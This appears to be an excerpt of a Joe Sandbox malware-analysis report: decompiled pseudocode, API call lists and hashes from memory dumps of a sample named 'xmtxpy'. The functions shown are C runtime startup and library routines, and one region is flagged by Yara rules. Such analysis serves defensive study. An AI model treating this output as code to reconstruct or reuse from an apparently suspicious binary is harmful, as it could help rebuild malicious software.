                          				if(_t32 == 0) {
                          					E008AF17A(_t45);
                          				}
                          				E008AEF02();
                          				 *(_t46 - 4) = 0xfffffffe;
                          				return E008AFF95(_t45);
                          			}
















                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.669434494.00000000008A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008A0000, based on PE: true
                          • Associated: 00000006.00000002.669427489.00000000008A0000.00000002.00000001.01000000.00000005.sdmp
                          • Associated: 00000006.00000002.669456673.00000000008B9000.00000002.00000001.01000000.00000005.sdmp
                          • Associated: 00000006.00000002.669464683.00000000008BE000.00000008.00000001.01000000.00000005.sdmp
                          • Associated: 00000006.00000002.669470976.00000000008C2000.00000002.00000001.01000000.00000005.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_8a0000_xmtxpy.jbxd
                          Similarity
                          • API ID: _fast_error_exit$CommandEnvironmentInitializeLineStrings___crt__cinit__ioinit__wsetargv__wsetenvp__wwincmdln
                          • String ID: .$
                          • API String ID: 965155184-2223841709
                          • Opcode ID: d09755f6bcf8eb5ce504bbe7748687d9629dc642e3d684f51b6e9c39cebf42d6
                          • Instruction ID: 87fadd7b4f139cd9cb2d781ec796443bfced0a472ba5b3baf0f4ca82842a2aec
                          • Opcode Fuzzy Hash: d09755f6bcf8eb5ce504bbe7748687d9629dc642e3d684f51b6e9c39cebf42d6
                          • Instruction Fuzzy Hash: B621B360A0071599FB607BF8988676B2650FF13754F244C7AFA05DADD3EFB8C8808A53
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 91%
                          			E008A30E5(void* __eax, void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi) {
                          				void* _t10;
                          				void* _t15;
                          				void* _t16;
                          				void* _t17;
                          				intOrPtr _t18;
                          				void* _t27;
                          				void* _t37;
                          				void* _t38;
                          				void* _t39;
                          				void* _t41;
                          
                          				_t39 = __esi;
                          				_t38 = __edi;
                          				_t37 = __edx;
                          				_t27 = __ebx;
                          				 *((intOrPtr*)(__ecx - 0x7f)) =  *((intOrPtr*)(__ecx - 0x7f)) + __eax;
                          				asm("in al, 0xe8");
                          				asm("lds ecx, [eax]");
                          				 *__ecx =  *__ecx + __ecx;
                          				_t43 = __ecx;
                          				if(__ecx == 0) {
                          					E008AE9B0(0x1c);
                          				}
                          				_t10 = E008AEDFA(_t27, _t38, _t43);
                          				_t44 = _t10;
                          				if(_t10 == 0) {
                          					_t10 = E008AE9B0(0x10);
                          				}
                          				E008AFA79(_t10);
                          				 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
                          				if(E008AF1A3(_t27, _t38, _t39, _t44) < 0) {
                          					E008AE9B0(0x1b);
                          				}
                          				 *0x8c101c = GetCommandLineW();
                          				 *0x8bf0c8 = E008AFAB9();
                          				_t15 = E008AF457();
                          				_t46 = _t15;
                          				if(_t15 < 0) {
                          					_t15 = E008AEED7(_t27, _t37, _t38, _t39, _t46, 8);
                          				}
                          				_t16 = E008AF694(_t15, _t27, _t37, _t38, _t39);
                          				_t47 = _t16;
                          				if(_t16 < 0) {
                          					E008AEED7(_t27, _t37, _t38, _t39, _t47, 9);
                          				}
                          				_t17 = E008AEF11(1);
                          				_t48 = _t17;
                          				if(_t17 != 0) {
                          					E008AEED7(_t27, _t37, _t38, _t39, _t48, _t17);
                          				}
                          				_t18 = E008AFEF7();
                          				_push(_t39);
                          				E008A1000(0x8a0000, 0, _t18);
                          				_t40 = _t18;
                          				 *((intOrPtr*)(_t41 - 0x24)) = _t18;
                          				if(_t27 == 0) {
                          					E008AF17A(_t40);
                          				}
                          				E008AEF02();
                          				 *(_t41 - 4) = 0xfffffffe;
                          				return E008AFF95(_t40);
                          			}

                          APIs
                          • _fast_error_exit.LIBCMT ref: 008AE8CF
                            • Part of subcall function 008AE9B0: __FF_MSGBANNER.LIBCMT ref: 008AE9BC
                            • Part of subcall function 008AE9B0: __NMSG_WRITE.LIBCMT ref: 008AE9C4
                          • _fast_error_exit.LIBCMT ref: 008AE8E0
                          • __RTC_Initialize.LIBCMT ref: 008AE8E6
                          • __ioinit.LIBCMT ref: 008AE8EF
                          • _fast_error_exit.LIBCMT ref: 008AE8FA
                          • GetCommandLineW.KERNEL32 ref: 008AE900
                          • ___crtGetEnvironmentStringsW.LIBCMT ref: 008AE90B
                          • __wsetargv.LIBCMT ref: 008AE915
                          • __wsetenvp.LIBCMT ref: 008AE926
                          • __cinit.LIBCMT ref: 008AE939
                          • __wwincmdln.LIBCMT ref: 008AE94A
                          Memory Dump Source
                          • Source File: 00000006.00000002.669434494.00000000008A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008A0000, based on PE: true
                          • Associated: 00000006.00000002.669427489.00000000008A0000.00000002.00000001.01000000.00000005.sdmp
                          • Associated: 00000006.00000002.669456673.00000000008B9000.00000002.00000001.01000000.00000005.sdmp
                          • Associated: 00000006.00000002.669464683.00000000008BE000.00000008.00000001.01000000.00000005.sdmp
                          • Associated: 00000006.00000002.669470976.00000000008C2000.00000002.00000001.01000000.00000005.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_8a0000_xmtxpy.jbxd
                          Similarity
                          • API ID: _fast_error_exit$CommandEnvironmentInitializeLineStrings___crt__cinit__ioinit__wsetargv__wsetenvp__wwincmdln
                          • String ID:
                          • API String ID: 965155184-0
                          • Opcode ID: b5ab956eed20f05a372d2e83b1aff10c2784c03741205e7fd92235a5aedd176e
                          • Instruction ID: 1f4328fb1270815b40bd831efc690f2a02e652aff3e1c4de0287aedc37cef172
                          • Opcode Fuzzy Hash: b5ab956eed20f05a372d2e83b1aff10c2784c03741205e7fd92235a5aedd176e
                          • Instruction Fuzzy Hash: B111BC20204316AAFA607BF89C46B6B2A44FF13354F240C7AFA40DACC3EFA9C4415223
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • CoInitialize.OLE32(00000000), ref: 0040438F
                          • CoCreateInstance.OLE32(00418EC0,00000000,00000001,00418EB0,?), ref: 004043A9
                          • VariantInit.OLEAUT32(?), ref: 004043C4
                          • SysAllocString.OLEAUT32(?), ref: 004043CD
                          • VariantInit.OLEAUT32(?), ref: 00404414
                          • SysAllocString.OLEAUT32(?), ref: 00404419
                          • VariantInit.OLEAUT32(?), ref: 00404431
                          Memory Dump Source
                          • Source File: 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_400000_xmtxpy.jbxd
                          Yara matches
                          Similarity
                          • API ID: InitVariant$AllocString$CreateInitializeInstance
                          • String ID:
                          • API String ID: 1312198159-0
                          • Opcode ID: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
                          • Instruction ID: 6cc2ba4480fbb4d68866773ab5e076051400aafb7d2546f6199fc19a864342a4
                          • Opcode Fuzzy Hash: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
                          • Instruction Fuzzy Hash: 9A414C71A00609EFDB00EFE4DC84ADEBF79FF89314F10406AFA05AB190DB759A458B94
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 84%
                          			E008AEDFA(void* __ebx, void* __edi, void* __eflags) {
                          				void* __esi;
                          				void* _t3;
                          				intOrPtr _t6;
                          				long* _t12;
                          				long _t14;
                          				void* _t19;
                          				void* _t21;
                          				void* _t25;
                          				long* _t26;
                          
                          				E008AEFA9(_t3, __ebx, __eflags);
                          				if(E008B02BA() != 0) {
                          					_t6 = E008AFB16(0x8aeb8b);
                          					 *0x8be000 = _t6;
                          					__eflags = _t6 - 0xffffffff;
                          					if(_t6 == 0xffffffff) {
                          						goto L1;
                          					} else {
                          						_t26 = E008B0340(1, 0x3bc);
                          						asm("lock pop ecx");
                          						_t19 = _t25;
                          						__eflags = _t26;
                          						if(_t26 == 0) {
                          							L7:
                          							E008AEE70();
                          							__eflags = 0;
                          							return 0;
                          						} else {
                          							_t12 = E008AFB72(_t19,  *0x8be000, _t26);
                          							_pop(_t21);
                          							__eflags = _t12;
                          							if(__eflags == 0) {
                          								goto L7;
                          							} else {
                          								_push(0);
                          								_push(_t26);
                          								E008AED47(__ebx, _t21, __edi, _t26, __eflags);
                          								_t14 = GetCurrentThreadId();
                          								_t26[1] = _t26[1] | 0xffffffff;
                          								 *_t26 = _t14;
                          								__eflags = 1;
                          								return 1;
                          							}
                          						}
                          					}
                          				} else {
                          					L1:
                          					E008AEE70();
                          					return 0;
                          				}
                          			}

                          APIs
                          • __init_pointers.LIBCMT ref: 008AEDFA
                            • Part of subcall function 008AEFA9: EncodePointer.KERNEL32(00000000,?,008AEDFF,008AE8DA), ref: 008AEFAC
                            • Part of subcall function 008AEFA9: __initp_misc_winsig.LIBCMT ref: 008AEFC7
                            • Part of subcall function 008AEFA9: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 008AFC2C
                            • Part of subcall function 008AEFA9: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 008AFC40
                            • Part of subcall function 008AEFA9: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 008AFC53
                            • Part of subcall function 008AEFA9: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 008AFC66
                            • Part of subcall function 008AEFA9: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 008AFC79
                            • Part of subcall function 008AEFA9: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 008AFC8C
                            • Part of subcall function 008AEFA9: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 008AFC9F
                            • Part of subcall function 008AEFA9: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 008AFCB2
                            • Part of subcall function 008AEFA9: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 008AFCC5
                            • Part of subcall function 008AEFA9: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 008AFCD8
                            • Part of subcall function 008AEFA9: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 008AFCEB
                            • Part of subcall function 008AEFA9: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 008AFCFE
                            • Part of subcall function 008AEFA9: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 008AFD11
                            • Part of subcall function 008AEFA9: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 008AFD24
                            • Part of subcall function 008AEFA9: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 008AFD37
                            • Part of subcall function 008AEFA9: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 008AFD4A
                          • __mtinitlocks.LIBCMT ref: 008AEDFF
                          • __mtterm.LIBCMT ref: 008AEE08
                            • Part of subcall function 008AEE70: DeleteCriticalSection.KERNEL32(?,?,?,?,008AEE6C), ref: 008B01D4
                            • Part of subcall function 008AEE70: _free.LIBCMT ref: 008B01DB
                            • Part of subcall function 008AEE70: DeleteCriticalSection.KERNEL32(008BE050,?,?,008AEE6C), ref: 008B01FD
                          • __calloc_crt.LIBCMT ref: 008AEE2D
                          • __initptd.LIBCMT ref: 008AEE4F
                          • GetCurrentThreadId.KERNEL32(008AE8DA), ref: 008AEE56
                          Memory Dump Source
                          • Source File: 00000006.00000002.669434494.00000000008A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008A0000, based on PE: true
                          • Associated: 00000006.00000002.669427489.00000000008A0000.00000002.00000001.01000000.00000005.sdmp
                          • Associated: 00000006.00000002.669456673.00000000008B9000.00000002.00000001.01000000.00000005.sdmp
                          • Associated: 00000006.00000002.669464683.00000000008BE000.00000008.00000001.01000000.00000005.sdmp
                          • Associated: 00000006.00000002.669470976.00000000008C2000.00000002.00000001.01000000.00000005.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_8a0000_xmtxpy.jbxd
                          Similarity
                          • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                          • String ID:
                          • API String ID: 3567560977-0
                          • Opcode ID: 318c54c34e44141bd607e003ac57ec6568834ccea85a06a08caeee8484214a81
                          • Instruction ID: 5818addd167e8e74cf8e56be3865739bf0e1a63963f318d768295572e4e5bb10
                          • Opcode Fuzzy Hash: 318c54c34e44141bd607e003ac57ec6568834ccea85a06a08caeee8484214a81
                          • Instruction Fuzzy Hash: 0FF0B432245B111AF6243B7CBC1B74B3681FB03730F200E29F161D99E2EF2094124552
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 16%
                          			E008AEE8D(void* __ecx, intOrPtr _a4) {
                          				struct HINSTANCE__* _v8;
                          				_Unknown_base(*)()* _t4;
                          
                          				_t4 =  &_v8;
                          				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t4, __ecx);
                          				if(_t4 != 0) {
                          					_t4 = GetProcAddress(_v8, "CorExitProcess");
                          					if(_t4 != 0) {
                          						return  *_t4(_a4);
                          					}
                          				}
                          				return _t4;
                          			}

                          APIs
                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,?,?,?,008AEECC,00000000,?,008B23C4,000000FF,0000001E,00000000,00000000,00000000,?,008B039E), ref: 008AEE9C
                          • GetProcAddress.KERNEL32(?,CorExitProcess,?,?,008AEECC,00000000,?,008B23C4,000000FF,0000001E,00000000,00000000,00000000,?,008B039E,00000000), ref: 008AEEAE
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.669434494.00000000008A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008A0000, based on PE: true
                          • Associated: 00000006.00000002.669427489.00000000008A0000.00000002.00000001.01000000.00000005.sdmp
                          • Associated: 00000006.00000002.669456673.00000000008B9000.00000002.00000001.01000000.00000005.sdmp
                          • Associated: 00000006.00000002.669464683.00000000008BE000.00000008.00000001.01000000.00000005.sdmp
                          • Associated: 00000006.00000002.669470976.00000000008C2000.00000002.00000001.01000000.00000005.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_8a0000_xmtxpy.jbxd
                          Similarity
                          • API ID: AddressHandleModuleProc
                          • String ID: CorExitProcess$mscoree.dll
                          • API String ID: 1646373207-1276376045
                          • Opcode ID: 249d69c3c2c87243973d28c7d34586873538a97f8847c1984ca131c15fd21474
                          • Instruction ID: db02c1f7bbd13a958da40bc1a58c1b6aab34935f565b77e06af8b5886e02d989
                          • Opcode Fuzzy Hash: 249d69c3c2c87243973d28c7d34586873538a97f8847c1984ca131c15fd21474
                          • Instruction Fuzzy Hash: 44D01230A44208BBDB115B91DC05F9A776DFB01741F040564FE58D5590DB719A149650
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E008B458A(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                          				char _v8;
                          				intOrPtr _v12;
                          				int _v20;
                          				int _t35;
                          				int _t38;
                          				intOrPtr* _t44;
                          				int _t47;
                          				short* _t49;
                          				intOrPtr _t50;
                          				intOrPtr _t54;
                          				int _t55;
                          				int _t59;
                          				char* _t62;
                          
                          				_t62 = _a8;
                          				if(_t62 == 0) {
                          					L5:
                          					return 0;
                          				}
                          				_t50 = _a12;
                          				if(_t50 == 0) {
                          					goto L5;
                          				}
                          				if( *_t62 != 0) {
                          					E008B0791( &_v20, _a16);
                          					_t35 = _v20;
                          					__eflags =  *(_t35 + 0xa8);
                          					if( *(_t35 + 0xa8) != 0) {
                          						_t38 = E008B44CC( *_t62 & 0x000000ff,  &_v20);
                          						__eflags = _t38;
                          						if(_t38 == 0) {
                          							__eflags = _a4;
                          							_t59 = 1;
                          							__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t62, 1, _a4, 0 | _a4 != 0x00000000);
                          							if(__eflags != 0) {
                          								L21:
                          								__eflags = _v8;
                          								if(_v8 != 0) {
                          									_t54 = _v12;
                          									_t31 = _t54 + 0x70;
                          									 *_t31 =  *(_t54 + 0x70) & 0xfffffffd;
                          									__eflags =  *_t31;
                          								}
                          								return _t59;
                          							}
                          							L20:
                          							_t44 = E008B10B7(__eflags);
                          							_t59 = _t59 | 0xffffffff;
                          							__eflags = _t59;
                          							 *_t44 = 0x2a;
                          							goto L21;
                          						}
                          						_t59 = _v20;
                          						__eflags =  *(_t59 + 0x74) - 1;
                          						if( *(_t59 + 0x74) <= 1) {
                          							L15:
                          							__eflags = _t50 -  *(_t59 + 0x74);
                          							L16:
                          							if(__eflags < 0) {
                          								goto L20;
                          							}
                          							__eflags = _t62[1];
                          							if(__eflags == 0) {
                          								goto L20;
                          							}
                          							L18:
                          							_t59 =  *(_t59 + 0x74);
                          							goto L21;
                          						}
                          						__eflags = _t50 -  *(_t59 + 0x74);
                          						if(__eflags < 0) {
                          							goto L16;
                          						}
                          						__eflags = _a4;
                          						_t47 = MultiByteToWideChar( *(_t59 + 4), 9, _t62,  *(_t59 + 0x74), _a4, 0 | _a4 != 0x00000000);
                          						_t59 = _v20;
                          						__eflags = _t47;
                          						if(_t47 != 0) {
                          							goto L18;
                          						}
                          						goto L15;
                          					}
                          					_t55 = _a4;
                          					__eflags = _t55;
                          					if(_t55 != 0) {
                          						 *_t55 =  *_t62 & 0x000000ff;
                          					}
                          					_t59 = 1;
                          					goto L21;
                          				}
                          				_t49 = _a4;
                          				if(_t49 != 0) {
                          					 *_t49 = 0;
                          				}
                          				goto L5;
                          			}

                          APIs
                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 008B45C0
                          • __isleadbyte_l.LIBCMT ref: 008B45EE
                          • MultiByteToWideChar.KERNEL32(00000080,00000009,00000108,00000001,?,00000000), ref: 008B461C
                          • MultiByteToWideChar.KERNEL32(00000080,00000009,00000108,00000001,?,00000000), ref: 008B4652
                          Memory Dump Source
                          • Source File: 00000006.00000002.669434494.00000000008A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008A0000, based on PE: true
                          • Associated: 00000006.00000002.669427489.00000000008A0000.00000002.00000001.01000000.00000005.sdmp
                          • Associated: 00000006.00000002.669456673.00000000008B9000.00000002.00000001.01000000.00000005.sdmp
                          • Associated: 00000006.00000002.669464683.00000000008BE000.00000008.00000001.01000000.00000005.sdmp
                          • Associated: 00000006.00000002.669470976.00000000008C2000.00000002.00000001.01000000.00000005.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_8a0000_xmtxpy.jbxd
                          Similarity
                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                          • String ID:
                          • API String ID: 3058430110-0
                          • Opcode ID: 6b240b56edede272b571c86c1ffde9a1f4641c8eee282ae4ba3bd2cf56c8d29b
                          • Instruction ID: b94b253cd542ed38b82e61e7192ea3bbd12b33aa9e81b9c686609f39ed242f49
                          • Opcode Fuzzy Hash: 6b240b56edede272b571c86c1ffde9a1f4641c8eee282ae4ba3bd2cf56c8d29b
                          • Instruction Fuzzy Hash: 3D31D03060065AAFEB218F79CC46BFA7BB5FF42350F155529E864C72A2E730E854DB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 96%
                          			E008B2429(void* __ebx, void* __edx, void* __edi, void* _a4, long _a8) {
                          				void* _t7;
                          				long _t8;
                          				intOrPtr* _t9;
                          				intOrPtr* _t12;
                          				long _t20;
                          				long _t31;
                          
                          				if(_a4 != 0) {
                          					_t31 = _a8;
                          					__eflags = _t31;
                          					if(_t31 != 0) {
                          						_push(__ebx);
                          						while(1) {
                          							__eflags = _t31 - 0xffffffe0;
                          							if(_t31 > 0xffffffe0) {
                          								break;
                          							}
                          							__eflags = _t31;
                          							if(_t31 == 0) {
                          								_t31 = _t31 + 1;
                          								__eflags = _t31;
                          							}
                          							_t7 = HeapReAlloc( *0x8bf100, 0, _a4, _t31);
                          							_t20 = _t7;
                          							__eflags = _t20;
                          							if(_t20 != 0) {
                          								L17:
                          								_t8 = _t20;
                          							} else {
                          								__eflags =  *0x8bff38 - _t7;
                          								if(__eflags == 0) {
                          									_t9 = E008B10B7(__eflags);
                          									 *_t9 = E008B10CA(GetLastError());
                          									goto L17;
                          								} else {
                          									__eflags = E008B13B0(_t7, _t31);
                          									if(__eflags == 0) {
                          										_t12 = E008B10B7(__eflags);
                          										 *_t12 = E008B10CA(GetLastError());
                          										L12:
                          										_t8 = 0;
                          										__eflags = 0;
                          									} else {
                          										continue;
                          									}
                          								}
                          							}
                          							goto L14;
                          						}
                          						E008B13B0(_t6, _t31);
                          						 *((intOrPtr*)(E008B10B7(__eflags))) = 0xc;
                          						goto L12;
                          					} else {
                          						E008B0308(_a4);
                          						_t8 = 0;
                          					}
                          					L14:
                          					return _t8;
                          				} else {
                          					return E008B2397(__ebx, __edx, __edi, _a8);
                          				}
                          			}










                          APIs
                          • _free.LIBCMT ref: 008B2448
                            • Part of subcall function 008B2397: __FF_MSGBANNER.LIBCMT ref: 008B23AE
                            • Part of subcall function 008B2397: __NMSG_WRITE.LIBCMT ref: 008B23B5
                            • Part of subcall function 008B2397: HeapAlloc.KERNEL32(00000000,00000000,00000001,00000000,00000000,00000000,?,008B039E,00000000,00000000,00000000,00000000,?,008B0253,00000018,008BCE98), ref: 008B23DA
                          Memory Dump Source
                          • Source File: 00000006.00000002.669434494.00000000008A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008A0000, based on PE: true
                          • Associated: 00000006.00000002.669427489.00000000008A0000.00000002.00000001.01000000.00000005.sdmp
                          • Associated: 00000006.00000002.669456673.00000000008B9000.00000002.00000001.01000000.00000005.sdmp
                          • Associated: 00000006.00000002.669464683.00000000008BE000.00000008.00000001.01000000.00000005.sdmp
                          • Associated: 00000006.00000002.669470976.00000000008C2000.00000002.00000001.01000000.00000005.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_8a0000_xmtxpy.jbxd
                          Similarity
                          • API ID: AllocHeap_free
                          • String ID:
                          • API String ID: 1080816511-0
                          • Opcode ID: 02115ea06127abb5c6a41f910a8904db0b355bb0f958777a09a344ef4b836d10
                          • Instruction ID: f0aa836b5b536b0d6639989ecb9ac4590cd3c53bf8cec690e951bc032c7541af
                          • Opcode Fuzzy Hash: 02115ea06127abb5c6a41f910a8904db0b355bb0f958777a09a344ef4b836d10
                          • Instruction Fuzzy Hash: 22110632500A15EFCF203F78AC08BDA37D8FF14364F104625FA48DEBA1EA3588818699
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E008B5DFD(void* __edx, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                          				intOrPtr _t25;
                          				void* _t26;
                          
                          				_t25 = _a16;
                          				if(_t25 == 0x65 || _t25 == 0x45) {
                          					_t26 = E008B634E(__eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                          					goto L9;
                          				} else {
                          					_t35 = _t25 - 0x66;
                          					if(_t25 != 0x66) {
                          						__eflags = _t25 - 0x61;
                          						if(_t25 == 0x61) {
                          							L7:
                          							_t26 = E008B5E83(_a4, _a8, _a12, _a20, _a24, _a28);
                          						} else {
                          							__eflags = _t25 - 0x41;
                          							if(__eflags == 0) {
                          								goto L7;
                          							} else {
                          								_t26 = E008B65C9(__edx, __esi, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                          							}
                          						}
                          						L9:
                          						return _t26;
                          					} else {
                          						return E008B6508(__edx, __esi, _t35, _a4, _a8, _a12, _a20, _a28);
                          					}
                          				}
                          			}






                          APIs
                          Memory Dump Source
                          • Source File: 00000006.00000002.669434494.00000000008A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008A0000, based on PE: true
                          • Associated: 00000006.00000002.669427489.00000000008A0000.00000002.00000001.01000000.00000005.sdmp
                          • Associated: 00000006.00000002.669456673.00000000008B9000.00000002.00000001.01000000.00000005.sdmp
                          • Associated: 00000006.00000002.669464683.00000000008BE000.00000008.00000001.01000000.00000005.sdmp
                          • Associated: 00000006.00000002.669470976.00000000008C2000.00000002.00000001.01000000.00000005.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_8a0000_xmtxpy.jbxd
                          Similarity
                          • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                          • String ID:
                          • API String ID: 3016257755-0
                          • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                          • Instruction ID: 52323a7aeb8314376a3117bedf4e11b5d1e225a609a33d4a0d7b72315e6ec6a5
                          • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                          • Instruction Fuzzy Hash: 8201087240054EBBCF225E98CC41DEE3F66FB1C354B598415FA1899235D336DAB1AB82
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E008A2AC1(void* __eax, void* __esi) {
                          				intOrPtr _t8;
                          				void* _t17;
                          				void* _t20;
                          				void* _t21;
                          				void* _t22;
                          				void* _t23;
                          
                          				_t17 = __esi + 1;
                          				_t20 = __eax + 1 -  *0x8bed30; // 0x8bfc08
                          				if(_t20 != 0) {
                          					E008B0308(_t5);
                          				}
                          				_t21 =  *((intOrPtr*)(_t17 + 0x44)) -  *0x8bed34; // 0x8bfc08
                          				if(_t21 != 0) {
                          					E008B0308(_t6);
                          				}
                          				_t22 =  *((intOrPtr*)(_t17 + 0x48)) -  *0x8bed38; // 0x8bfc08
                          				if(_t22 != 0) {
                          					E008B0308(_t7);
                          				}
                          				_t8 =  *((intOrPtr*)(_t17 + 0x4c));
                          				_t23 = _t8 -  *0x8bed3c; // 0x8bfc08
                          				if(_t23 != 0) {
                          					_t8 = E008B0308(_t8);
                          				}
                          				return _t8;
                          			}










                          APIs
                          • _free.LIBCMT ref: 008B260B
                            • Part of subcall function 008B0308: HeapFree.KERNEL32(00000000,00000000), ref: 008B031C
                            • Part of subcall function 008B0308: GetLastError.KERNEL32(00000000,?,008AED38,00000000,008B10BC,008B7791,00000000,?,008B688D,00000000,00010000,00030000,?,008B4AE7), ref: 008B032E
                          • _free.LIBCMT ref: 008B261D
                          • _free.LIBCMT ref: 008B262F
                          • _free.LIBCMT ref: 008B2641
                          Memory Dump Source
                          • Source File: 00000006.00000002.669434494.00000000008A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008A0000, based on PE: true
                          • Associated: 00000006.00000002.669427489.00000000008A0000.00000002.00000001.01000000.00000005.sdmp
                          • Associated: 00000006.00000002.669456673.00000000008B9000.00000002.00000001.01000000.00000005.sdmp
                          • Associated: 00000006.00000002.669464683.00000000008BE000.00000008.00000001.01000000.00000005.sdmp
                          • Associated: 00000006.00000002.669470976.00000000008C2000.00000002.00000001.01000000.00000005.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_8a0000_xmtxpy.jbxd
                          Similarity
                          • API ID: _free$ErrorFreeHeapLast
                          • String ID:
                          • API String ID: 776569668-0
                          • Opcode ID: 25b42ed8889a5afab1f3351924d049d24a8b292386ec0a623a96f03d2346be71
                          • Instruction ID: 43e15a15d5b96cb2ff248fd7215bf6be304855f98b2f329056588cc4e60cfb3e
                          • Opcode Fuzzy Hash: 25b42ed8889a5afab1f3351924d049d24a8b292386ec0a623a96f03d2346be71
                          • Instruction Fuzzy Hash: 33E092321952149FD614EBACF9CA8DB33ECF6193107740C05F085C7320D625F8804B25
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 61%
                          			E008A592D(intOrPtr* __eax, void* __edx, void* __edi, void* __esi) {
                          				signed int _v4;
                          				signed int _t7;
                          				void* _t8;
                          				void* _t10;
                          				void* _t11;
                          				void* _t18;
                          				void* _t19;
                          				void* _t20;
                          				void* _t24;
                          				void* _t25;
                          				void* _t26;
                          				void* _t29;
                          				signed int _t31;
                          				void* _t35;
                          				void* _t36;
                          
                          				_t25 = __edi;
                          				_t24 = __edx;
                          				 *__eax =  *__eax + __eax;
                          				_t36 = _t35 + 0xc;
                          				if(__eax != 0) {
                          					L9:
                          					_push(_t19);
                          					_push(_t19);
                          					_push(_t19);
                          					_push(_t19);
                          					_push(_t19);
                          					E008B1058(_t19, _t24);
                          					asm("int3");
                          					_push(_t31);
                          					_t7 = _v4;
                          					 *0x8bf418 = _t7;
                          					return _t7;
                          				} else {
                          					_t8 = E008B193E(0x8bf452);
                          					_pop(_t21);
                          					if(_t8 + 1 <= 0x3c) {
                          						L4:
                          						_t10 = E008B19EB(0x8bf420, 0x314, L"\n\n");
                          						_t36 = _t36 + 0xc;
                          						if(_t10 != 0) {
                          							goto L9;
                          						} else {
                          							_t11 = E008B19EB(0x8bf420, 0x314, _t25);
                          							_t36 = _t36 + 0xc;
                          							_t43 = _t11;
                          							if(_t11 != 0) {
                          								goto L9;
                          							} else {
                          								E008B1B15(_t21, _t24, _t43, 0x8bf420, L"Microsoft Visual C++ Runtime Library", 0x12010);
                          								_pop(_t20);
                          								_pop(_t26);
                          								_pop(_t29);
                          								return E008B1CFB(_t20, _v4 ^ _t31, _t24, _t26, _t29);
                          							}
                          						}
                          					} else {
                          						_t21 = 0x8bf3dc + E008B193E(0x8bf452) * 2;
                          						_t18 = E008B1A57(0x8bf3dc + E008B193E(0x8bf452) * 2, __esi - (0x8bf3dc + E008B193E(0x8bf452) * 2 - 0x8bf452 >> 1), L"...", 3);
                          						_t36 = _t36 + 0x14;
                          						if(_t18 != 0) {
                          							goto L9;
                          						} else {
                          							goto L4;
                          						}
                          					}
                          				}
                          			}



















